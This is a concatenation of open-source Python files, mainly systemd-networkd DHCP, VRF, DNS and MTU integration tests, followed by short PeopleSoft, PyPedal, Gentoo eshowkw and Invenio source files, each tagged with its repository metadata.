    output = check_output('ip -4 address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, '192.168.5')
    self.assertRegex(output, 'valid_lft forever preferred_lft forever')
    output = check_output('ip -6 address show dev veth99 scope global')
    print(output)
    self.assertRegex(output, '2600::')
    self.assertRegex(output, 'valid_lft forever preferred_lft forever')
@expectedFailureIfModuleIsNotAvailable('vrf')
def test_dhcp_client_vrf(self):
    """A DHCP client enslaved to a VRF must keep its addresses/routes inside the VRF table."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-vrf.network',
                                    '25-vrf.netdev', '25-vrf.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable', 'vrf99:carrier'])
    # The link becomes 'routable' when at least one protocol provides a valid address,
    # so wait explicitly for both address families.
    self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
    self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
    print('## ip -d link show dev vrf99')
    output = check_output('ip -d link show dev vrf99')
    print(output)
    self.assertRegex(output, 'vrf table 42')
    print('## ip address show vrf vrf99')
    output = check_output('ip address show vrf vrf99')
    print(output)
    self.assertRegex(output, 'inet 169.254.[0-9]*.[0-9]*/16 brd 169.254.255.255 scope link veth99')
    self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    self.assertRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)')
    self.assertRegex(output, 'inet6 .* scope link')
    print('## ip address show dev veth99')
    output = check_output('ip address show dev veth99')
    print(output)
    self.assertRegex(output, 'inet 169.254.[0-9]*.[0-9]*/16 brd 169.254.255.255 scope link veth99')
    self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    self.assertRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)')
    self.assertRegex(output, 'inet6 .* scope link')
    print('## ip route show vrf vrf99')
    output = check_output('ip route show vrf vrf99')
    print(output)
    self.assertRegex(output, 'default via 192.168.5.1 dev veth99 proto dhcp src 192.168.5.')
    self.assertRegex(output, '169.254.0.0/16 dev veth99 proto kernel scope link src 169.254')
    self.assertRegex(output, '192.168.5.0/24 dev veth99 proto kernel scope link src 192.168.5')
    self.assertRegex(output, '192.168.5.0/24 via 192.168.5.5 dev veth99 proto dhcp')
    self.assertRegex(output, '192.168.5.1 dev veth99 proto dhcp scope link src 192.168.5')
    print('## ip route show table main dev veth99')
    output = check_output('ip route show table main dev veth99')
    print(output)
    # Nothing may leak into the main routing table.
    self.assertEqual(output, '')
def test_dhcp_client_gateway_onlink_implicit(self):
    """Routes via the DHCP gateway must be installed with the implicit 'onlink' flag."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
                                    'dhcp-client-gateway-onlink-implicit.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq()
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, '192.168.5')
    output = check_output('ip route list dev veth99 10.0.0.0/8')
    print(output)
    self.assertRegex(output, 'onlink')
    output = check_output('ip route list dev veth99 192.168.100.0/24')
    print(output)
    self.assertRegex(output, 'onlink')
def test_dhcp_client_with_ipv4ll_fallback_with_dhcp_server(self):
    """With a DHCP server present, the IPv4LL fallback address must never appear."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
                                    'dhcp-client-with-ipv4ll-fallback-with-dhcp-server.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq(lease_time='2m')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99')
    print(output)
    output = check_output('ip -6 address show dev veth99 scope global dynamic')
    self.assertNotRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global dynamic')
    output = check_output('ip -6 address show dev veth99 scope link')
    self.assertRegex(output, 'inet6 .* scope link')
    output = check_output('ip -4 address show dev veth99 scope global dynamic')
    self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    output = check_output('ip -4 address show dev veth99 scope link')
    self.assertNotRegex(output, 'inet .* scope link')
    # Even after lease expiry + renewal, DHCP (not IPv4LL) must win.
    print('Wait for the dynamic address to be expired')
    time.sleep(130)
    output = check_output('ip address show dev veth99')
    print(output)
    output = check_output('ip -6 address show dev veth99 scope global dynamic')
    self.assertNotRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global dynamic')
    output = check_output('ip -6 address show dev veth99 scope link')
    self.assertRegex(output, 'inet6 .* scope link')
    output = check_output('ip -4 address show dev veth99 scope global dynamic')
    self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    output = check_output('ip -4 address show dev veth99 scope link')
    self.assertNotRegex(output, 'inet .* scope link')
    search_words_in_dnsmasq_log('DHCPOFFER', show_all=True)
def test_dhcp_client_with_ipv4ll_fallback_without_dhcp_server(self):
    """Without a DHCP server, the client must fall back to a link-local IPv4LL address."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
                                    'dhcp-client-with-ipv4ll-fallback-without-dhcp-server.network')
    start_networkd()
    self.wait_online(['veth99:degraded', 'veth-peer:routable'])
    output = check_output('ip address show dev veth99')
    print(output)
    output = check_output('ip -6 address show dev veth99 scope global dynamic')
    self.assertNotRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global dynamic')
    output = check_output('ip -6 address show dev veth99 scope link')
    self.assertRegex(output, 'inet6 .* scope link')
    output = check_output('ip -4 address show dev veth99 scope global dynamic')
    self.assertNotRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    # Only the IPv4LL (169.254.0.0/16 scope link) address must be present.
    output = check_output('ip -4 address show dev veth99 scope link')
    self.assertRegex(output, 'inet .* scope link')
def test_dhcp_client_route_remove_on_renew(self):
    """Routes derived from the old lease address must be removed when a new address is leased."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
                                    'dhcp-client-ipv4-only-ipv6-disabled.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq(ipv4_range='192.168.5.100,192.168.5.199', lease_time='2m')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # test for issue #12490
    output = check_output('ip -4 address show dev veth99 scope global dynamic')
    print(output)
    self.assertRegex(output, 'inet 192.168.5.1[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    # Extract the first leased address (from the .100-.199 range).
    address1=None
    for line in output.splitlines():
        if 'brd 192.168.5.255 scope global dynamic veth99' in line:
            address1 = line.split()[1].split('/')[0]
            break
    output = check_output('ip -4 route show dev veth99')
    print(output)
    self.assertRegex(output, f'default via 192.168.5.1 proto dhcp src {address1} metric 1024')
    self.assertRegex(output, f'192.168.5.1 proto dhcp scope link src {address1} metric 1024')
    # Restart the server with a disjoint range so renewal yields a new address.
    stop_dnsmasq(dnsmasq_pid_file)
    start_dnsmasq(ipv4_range='192.168.5.200,192.168.5.250', lease_time='2m')
    print('Wait for the dynamic address to be expired')
    time.sleep(130)
    output = check_output('ip -4 address show dev veth99 scope global dynamic')
    print(output)
    self.assertRegex(output, 'inet 192.168.5.2[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
    # Extract the second leased address (from the .200-.250 range).
    address2=None
    for line in output.splitlines():
        if 'brd 192.168.5.255 scope global dynamic veth99' in line:
            address2 = line.split()[1].split('/')[0]
            break
    self.assertNotEqual(address1, address2)
    # Routes sourced from the old address must be gone; new-address routes present.
    output = check_output('ip -4 route show dev veth99')
    print(output)
    self.assertNotRegex(output, f'default via 192.168.5.1 proto dhcp src {address1} metric 1024')
    self.assertNotRegex(output, f'192.168.5.1 proto dhcp scope link src {address1} metric 1024')
    self.assertRegex(output, f'default via 192.168.5.1 proto dhcp src {address2} metric 1024')
    self.assertRegex(output, f'192.168.5.1 proto dhcp scope link src {address2} metric 1024')
def test_dhcp_client_use_dns_yes(self):
    """UseDNS=yes: both DHCPv4 and DHCPv6 DNS servers must be passed to resolved."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-yes.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The link becomes 'routable' when at least one protocol provides a valid address,
    # so wait explicitly for both address families.
    self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
    self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
    # Give resolved a moment to pick up the per-link DNS configuration.
    time.sleep(3)
    output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
    print(output)
    self.assertRegex(output, '192.168.5.1')
    self.assertRegex(output, '2600::1')
def test_dhcp_client_use_dns_no(self):
    """UseDNS=no: DHCP-provided DNS servers must NOT be passed to resolved."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-no.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The link becomes 'routable' when at least one protocol provides a valid address,
    # so wait explicitly for both address families.
    self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
    self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
    # Give resolved a moment to pick up the per-link DNS configuration.
    time.sleep(3)
    output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
    print(output)
    self.assertNotRegex(output, '192.168.5.1')
    self.assertNotRegex(output, '2600::1')
def test_dhcp_client_use_dns_ipv4(self):
    """UseDNS=ipv4 variant: only the DHCPv4 DNS server must reach resolved."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-ipv4.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The link becomes 'routable' when at least one protocol provides a valid address,
    # so wait explicitly for both address families.
    self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
    self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
    # Give resolved a moment to pick up the per-link DNS configuration.
    time.sleep(3)
    output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
    print(output)
    self.assertRegex(output, '192.168.5.1')
    self.assertNotRegex(output, '2600::1')
def test_dhcp_client_use_dns_ipv4_and_ra(self):
    """UseDNS enabled for both DHCPv4 and DHCPv6/RA: both DNS servers are used."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-dns-ipv4-and-ra.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq('--dhcp-option=option:dns-server,192.168.5.1 --dhcp-option=option6:dns-server,[2600::1]')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The link becomes 'routable' as soon as one protocol provides a valid
    # address, so wait explicitly for both the DHCPv4 and DHCPv6 leases.
    self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
    self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
    # Give systemd-resolved a moment to process the lease information.
    time.sleep(3)
    output = check_output(*resolvectl_cmd, 'dns', 'veth99', env=env)
    print(output)
    # Both the v4 and v6 DNS servers must have been configured.
    self.assertRegex(output, '192.168.5.1')
    self.assertRegex(output, '2600::1')
def test_dhcp_client_use_domains(self):
    """UseDomains=yes: the DHCP-provided search domain must be configured."""
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-use-domains.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    start_dnsmasq('--dhcp-option=option:domain-search,example.com')
    self.wait_online(['veth99:routable', 'veth-peer:routable'])
    # The search domain must show up both in networkctl's link status ...
    output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
    print(output)
    self.assertRegex(output, 'Search Domains: example.com')
    # ... and, after giving systemd-resolved a moment, in resolvectl.
    time.sleep(3)
    output = check_output(*resolvectl_cmd, 'domain', 'veth99', env=env)
    print(output)
    self.assertRegex(output, 'example.com')
def test_dhcp_client_decline(self):
    """A DECLINEd DHCP lease must leave the link unconfigured.

    The server/client units are set up so that the client declines the
    offered address; veth99 must therefore never become 'routable' and
    systemd-networkd-wait-online must give up with exit code 1.
    """
    copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-decline.network', 'dhcp-client-decline.network')
    start_networkd()
    self.wait_online(['veth-peer:carrier'])
    rc = call(*wait_online_cmd, '--timeout=10s', '--interface=veth99:routable', env=env)
    # assertEqual reports the actual exit code on failure, unlike the
    # previous assertTrue(rc == 1) which only printed 'False is not true'.
    self.assertEqual(rc, 1)
class NetworkdIPv6PrefixTests(unittest.TestCase, Utilities):
    """Tests for IPv6 prefix announcement via router advertisements."""

    # Links/units created by the tests; cleaned up in setUp/tearDown.
    links = ['veth99']
    units = [
        '25-veth.netdev',
        'ipv6ra-prefix-client.network',
        'ipv6ra-prefix.network'
    ]

    def setUp(self):
        # Start from a clean slate: no leftover links, networkd stopped.
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        remove_log_file()
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def test_ipv6_route_prefix(self):
        """The announced prefix must appear as an RA route on the peer."""
        copy_unit_to_networkd_unit_path('25-veth.netdev', 'ipv6ra-prefix-client.network', 'ipv6ra-prefix.network')
        start_networkd()
        self.wait_online(['veth99:routable', 'veth-peer:routable'])
        output = check_output('ip', '-6', 'route', 'show', 'dev', 'veth-peer')
        print(output)
        self.assertRegex(output, '2001:db8:0:1::/64 proto ra')
class NetworkdMTUTests(unittest.TestCase, Utilities):
    """Tests for setting the device MTU and the per-link IPv6 MTU via
    .network, .netdev and .link files."""

    links = ['dummy98']
    units = [
        '12-dummy.netdev',
        '12-dummy-mtu.netdev',
        '12-dummy-mtu.link',
        '12-dummy.network',
    ]

    def setUp(self):
        remove_links(self.links)
        stop_networkd(show_logs=False)

    def tearDown(self):
        remove_log_file()
        remove_links(self.links)
        remove_unit_from_networkd_path(self.units)
        stop_networkd(show_logs=True)

    def check_mtu(self, mtu, ipv6_mtu=None, reset=True):
        """Assert that dummy98 ends up with the given device MTU and IPv6 MTU
        (both as strings) after a fresh start and after a restart of networkd.
        If ipv6_mtu is not given, it is expected to equal the device MTU.
        With reset=True, additionally re-check via reset_check_mtu()."""
        if not ipv6_mtu:
            ipv6_mtu = mtu

        # test normal start
        start_networkd()
        self.wait_online(['dummy98:routable'])
        self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'mtu'), ipv6_mtu)
        self.assertEqual(read_link_attr('dummy98', 'mtu'), mtu)

        # test normal restart
        restart_networkd()
        self.wait_online(['dummy98:routable'])
        self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'mtu'), ipv6_mtu)
        self.assertEqual(read_link_attr('dummy98', 'mtu'), mtu)

        if reset:
            self.reset_check_mtu(mtu, ipv6_mtu)

    def reset_check_mtu(self, mtu, ipv6_mtu=None):
        ''' test setting mtu/ipv6_mtu with interface already up '''
        stop_networkd()

        # note - changing the device mtu resets the ipv6 mtu
        run('ip link set up mtu 1501 dev dummy98')
        run('ip link set up mtu 1500 dev dummy98')
        self.assertEqual(read_link_attr('dummy98', 'mtu'), '1500')
        self.assertEqual(read_ipv6_sysctl_attr('dummy98', 'mtu'), '1500')

        # reset=False here to avoid recursing back into this method
        self.check_mtu(mtu, ipv6_mtu, reset=False)

    def test_mtu_network(self):
        copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/mtu.conf')
        self.check_mtu('1600')

    def test_mtu_netdev(self):
        copy_unit_to_networkd_unit_path('12-dummy-mtu.netdev', '12-dummy.network', dropins=False)
        # note - MTU set by .netdev happens ONLY at device creation!
        self.check_mtu('1600', reset=False)

    def test_mtu_link(self):
        copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy-mtu.link', '12-dummy.network', dropins=False)
        # must reload udev because it only picks up new files after 3 second delay
        call('udevadm control --reload')
        # note - MTU set by .link happens ONLY at udev processing of device 'add' uevent!
        self.check_mtu('1600', reset=False)

    def test_ipv6_mtu(self):
        ''' set ipv6 mtu without setting device mtu '''
        copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/ipv6-mtu-1400.conf')
        self.check_mtu('1500', '1400')

    def test_ipv6_mtu_toolarge(self):
        ''' try set ipv6 mtu over device mtu (it shouldn't work) '''
        copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/ipv6-mtu-1550.conf')
        self.check_mtu('1500', '1500')

    def test_mtu_network_ipv6_mtu(self):
        ''' set ipv6 mtu and set device mtu via network file '''
        copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy.network.d/mtu.conf', '12-dummy.network.d/ipv6-mtu-1550.conf')
        self.check_mtu('1600', '1550')

    def test_mtu_netdev_ipv6_mtu(self):
        ''' set ipv6 mtu and set device mtu via netdev file '''
        copy_unit_to_networkd_unit_path('12-dummy-mtu.netdev', '12-dummy.network.d/ipv6-mtu-1550.conf')
        self.check_mtu('1600', '1550', reset=False)

    def test_mtu_link_ipv6_mtu(self):
        ''' set ipv6 mtu and set device mtu via link file '''
        copy_unit_to_networkd_unit_path('12-dummy.netdev', '12-dummy-mtu.link', '12-dummy.network.d/ipv6-mtu-1550.conf')
        # must reload udev because it only picks up new files after 3 second delay
        call('udevadm control --reload')
        self.check_mtu('1600', '1550', reset=False)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--build-dir', help='Path to build dir', dest='build_dir')
    parser.add_argument('--networkd', help='Path to systemd-networkd', dest='networkd_bin')
    parser.add_argument('--resolved', help='Path to systemd-resolved', dest='resolved_bin')
    parser.add_argument('--wait-online', help='Path to systemd-networkd-wait-online', dest='wait_online_bin')
    parser.add_argument('--networkctl', help='Path to networkctl', dest='networkctl_bin')
    parser.add_argument('--resolvectl', help='Path to resolvectl', dest='resolvectl_bin')
    parser.add_argument('--timedatectl', help='Path to timedatectl', dest='timedatectl_bin')
    parser.add_argument('--valgrind', help='Enable valgrind', dest='use_valgrind', type=bool, nargs='?', const=True, default=use_valgrind)
    parser.add_argument('--debug', help='Generate debugging logs', dest='enable_debug', type=bool, nargs='?', const=True, default=enable_debug)
    parser.add_argument('--asan-options', help='ASAN options', dest='asan_options')
    parser.add_argument('--lsan-options', help='LSAN options', dest='lsan_options')
    parser.add_argument('--ubsan-options', help='UBSAN options', dest='ubsan_options')
    # Recognized options are stored as attributes on the `unittest` module
    # object (it is passed as the namespace); unknown arguments are collected
    # in `args` and handed to unittest.main() below.
    ns, args = parser.parse_known_args(namespace=unittest)

    if ns.build_dir:
        # --build-dir overrides all individual binary paths.
        if ns.networkd_bin or ns.resolved_bin or ns.wait_online_bin or ns.networkctl_bin or ns.resolvectl_bin or ns.timedatectl_bin:
            print('WARNING: --networkd, --resolved, --wait-online, --networkctl, --resolvectl, or --timedatectl options are ignored when --build-dir is specified.')
        networkd_bin = os.path.join(ns.build_dir, 'systemd-networkd')
        resolved_bin = os.path.join(ns.build_dir, 'systemd-resolved')
        wait_online_bin = os.path.join(ns.build_dir, 'systemd-networkd-wait-online')
        networkctl_bin = os.path.join(ns.build_dir, 'networkctl')
        resolvectl_bin = os.path.join(ns.build_dir, 'resolvectl')
        timedatectl_bin = os.path.join(ns.build_dir, 'timedatectl')
    else:
        # Only override the module-level defaults for binaries given explicitly.
        if ns.networkd_bin:
            networkd_bin = ns.networkd_bin
        if ns.resolved_bin:
            resolved_bin = ns.resolved_bin
        if ns.wait_online_bin:
            wait_online_bin = ns.wait_online_bin
        if ns.networkctl_bin:
            networkctl_bin = ns.networkctl_bin
        if ns.resolvectl_bin:
            resolvectl_bin = ns.resolvectl_bin
        if ns.timedatectl_bin:
            timedatectl_bin = ns.timedatectl_bin

    use_valgrind = ns.use_valgrind
    enable_debug = ns.enable_debug
    asan_options = ns.asan_options
    lsan_options = ns.lsan_options
    ubsan_options = ns.ubsan_options

    # Wrap the helper tools in valgrind if requested.
    if use_valgrind:
        networkctl_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', networkctl_bin]
        resolvectl_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', resolvectl_bin]
        timedatectl_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', timedatectl_bin]
        wait_online_cmd = ['valgrind', '--track-origins=yes', '--leak-check=full', '--show-leak-kinds=all', wait_online_bin]
    else:
        networkctl_cmd = [networkctl_bin]
        resolvectl_cmd = [resolvectl_bin]
        timedatectl_cmd = [timedatectl_bin]
        wait_online_cmd = [wait_online_bin]

    # Environment passed to every spawned service/tool.
    if enable_debug:
        env.update({ 'SYSTEMD_LOG_LEVEL' : 'debug' })
    if asan_options:
        env.update({ 'ASAN_OPTIONS' : asan_options })
    if lsan_options:
        env.update({ 'LSAN_OPTIONS' : lsan_options })
    if ubsan_options:
        env.update({ 'UBSAN_OPTIONS' : ubsan_options })

    # Pass the remaining (unparsed) arguments on to unittest.
    sys.argv[1:] = args
    unittest.main(testRunner=unittest.TextTestRunner(stream=sys.stdout,
                                                     verbosity=3))
| dsd/systemd | test/test-network/systemd-networkd-tests.py | Python | gpl-2.0 | 156,648 |
# returns the current PeopleSoft semester code, as of today
# if today is between semesters, returns the next semester code
import cx_Oracle
def getCurrentOrNextSemesterCX (self):
    """Return the current PeopleSoft UGRD semester code ('strm').

    If today falls between semesters, return the code of the next
    semester instead.  Returns None if neither query yields a row.
    """
    # The last non-empty, non-comment line of the file holds the Oracle
    # connect string.  (Renamed from `file` to avoid shadowing the builtin;
    # `<>` replaced by `!=`; handles are now closed reliably.)
    connString = None
    conn_file = open('/opt/Plone-2.5.5/zeocluster/client1/Extensions/Oracle_Database_Connection_NGUYEN_PRD.txt', 'r')
    try:
        for line in conn_file.readlines():
            if line != "" and not line.startswith('#'):
                connString = line
    finally:
        conn_file.close()
    connection = cx_Oracle.connect(connString)
    try:
        cursor = connection.cursor()
        # Current semester: today lies within its begin/end dates.
        cursor.execute("""select strm from ps_term_tbl where institution = 'UWOSH' and acad_career = 'UGRD' and term_begin_dt <= sysdate and term_end_dt >= sysdate""")
        for column_1 in cursor:
            return column_1[0]
        # Otherwise: the semester with the earliest begin date in the future.
        cursor.execute("""select t1.strm, t1.descr from ps_term_tbl t1 where t1.institution = 'UWOSH' and t1.acad_career = 'UGRD' and t1.term_begin_dt = (select min(term_begin_dt) from ps_term_tbl t2 where t2.institution = t1.institution and t2.acad_career = t1.acad_career and term_begin_dt > sysdate)""")
        for column_1 in cursor:
            return column_1[0]
    finally:
        connection.close()
| uwosh/Campus_Directory_web_service | getCurrentOrNextSemesterCX.py | Python | gpl-2.0 | 1,292 |
#!/usr/bin/python
###############################################################################
# NAME: new_graphics3.py
# VERSION: 2.0.0b15 (18SEPTEMBER2006)
# AUTHOR: John B. Cole, PhD (jcole@aipl.arsusda.gov)
# LICENSE: LGPL
###############################################################################
from PyPedal import pyp_demog
from PyPedal import pyp_graphics
from PyPedal import pyp_jbc
from PyPedal import pyp_newclasses
from PyPedal import pyp_nrm
from PyPedal import pyp_metrics
from PyPedal.pyp_utils import pyp_nice_time
if __name__ == '__main__':
print 'Starting pypedal.py at %s' % (pyp_nice_time())
example = pyp_newclasses.loadPedigree(optionsfile='new_graphics3.ini')
if example.kw['messages'] == 'verbose':
print '[INFO]: Calling pyp_graphics.new_draw_pedigree() at %s' % (pyp_nice_time())
pyp_graphics.new_draw_pedigree(example, gfilename='graphics3', gtitle='graphics3 pedigree', gorient='p')
pyp_jbc.color_pedigree(example,gfilename='graphics3', ghatch='0', \
metric='sons', gtitle='Nodes are colored by number of sons.', \
gprog='dot', gname=1) | wintermind/pypedal | PyPedal/examples/new_graphics3.py | Python | gpl-2.0 | 1,123 |
# vim:fileencoding=utf-8
# Copyright 2001-2010 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = ['keywords_header']
from portage import settings as ports
from portage.output import colorize
from display_pretty import colorize_string
from display_pretty import align_string
class keywords_header:
    """Header columns for eshowkw: keyword names plus additional/extra fields."""

    # Architectures considered important; highlighted (dark yellow) in output.
    __IMPARCHS = [ 'arm', 'amd64', 'x86' ]
    # Fields displayed after the keywords (2nd part of the header).
    __ADDITIONAL_FIELDS = [ 'unused', 'slot' ]
    # Fields displayed last (3rd part of the header).
    __EXTRA_FIELDS = [ 'repo' ]

    def __readKeywords(self):
        """Read all available (non-testing) keywords from portage."""
        return [x for x in ports.archlist()
            if not x.startswith('~')]

    def __sortKeywords(self, keywords, prefix = False, required_keywords = None):
        """Sort keywords with short archs first.

        Fixed: `required_keywords` previously used a mutable default ([]).
        """
        if required_keywords is None:
            required_keywords = []
        # user specified only some keywords to display
        if len(required_keywords) != 0:
            tmpkeywords = [k for k in keywords
                if k in required_keywords]
            # ignore the filter if it matched nothing (non-existent archs)
            if len(tmpkeywords) != 0:
                keywords = tmpkeywords
        normal = [k for k in keywords
            if len(k.split('-')) == 1]
        normal.sort()
        if prefix:
            longer = [k for k in keywords
                if len(k.split('-')) != 1]
            longer.sort()
            normal.extend(longer)
        return normal

    def __readAdditionalFields(self):
        """Prepare list of additional fields displayed by eshowkw (2nd part)."""
        return self.__ADDITIONAL_FIELDS

    def __readExtraFields(self):
        """Prepare list of extra fields displayed by eshowkw (3rd part)."""
        return self.__EXTRA_FIELDS

    def __formatKeywords(self, keywords, align, length):
        """Append colors and align keywords properly."""
        tmp = []
        for keyword in keywords:
            tmp2 = keyword
            keyword = align_string(keyword, align, length)
            # % are used as separators for further split so we won't lose spaces and coloring
            keyword = '%'.join(list(keyword))
            if tmp2 in self.__IMPARCHS:
                tmp.append(colorize_string('darkyellow', keyword))
            else:
                tmp.append(keyword)
        return tmp

    def __formatAdditional(self, additional, align, length):
        """Align additional items properly."""
        # % are used as separators for further split so we won't lose spaces and coloring
        return ['%'.join(align_string(x, align, length)) for x in additional]

    def __prepareExtra(self, extra, align, length):
        """Build the extra-fields column: a separator line plus the fields."""
        content = []
        content.append(''.ljust(length, '-'))
        content.extend(self.__formatAdditional(extra, align, length))
        return content

    def __prepareResult(self, keywords, additional, align, length):
        """Parse keywords and additional fields into one list with proper separators."""
        content = []
        content.append(''.ljust(length, '-'))
        content.extend(self.__formatKeywords(keywords, align, length))
        content.append(''.ljust(length, '-'))
        content.extend(self.__formatAdditional(additional, align, length))
        return content

    def __init__(self, prefix = False, required_keywords = None, keywords_align = 'bottom'):
        """Initialize keywords header.

        Fixed: `required_keywords` previously used a mutable default ([]).
        """
        if required_keywords is None:
            required_keywords = []
        additional = self.__readAdditionalFields()
        extra = self.__readExtraFields()
        self.keywords = self.__sortKeywords(self.__readKeywords(), prefix, required_keywords)
        # Column width: the longest string among keywords, additional and extra.
        self.length = max(
            max([len(x) for x in self.keywords]),
            max([len(x) for x in additional]),
            max([len(x) for x in extra])
        )
        self.keywords_count = len(self.keywords)
        self.additional_count = len(additional)
        self.extra_count = len(extra)
        self.content = self.__prepareResult(self.keywords, additional, keywords_align, self.length)
        self.extra = self.__prepareExtra(extra, keywords_align, self.length)
| djanderson/equery | pym/gentoolkit/eshowkw/keywords_header.py | Python | gpl-2.0 | 3,555 |
## This file is part of Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Invenio Access Control FireRole."""
__revision__ = "$Id$"
__lastupdated__ = """$Date$"""
"""These functions are for realizing a firewall like role definition for extending
webaccess to connect user to roles using every infos about users.
"""
import re
import cPickle
from zlib import compress, decompress
import sys
import time
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
from invenio.access_control_config import InvenioWebAccessFireroleError
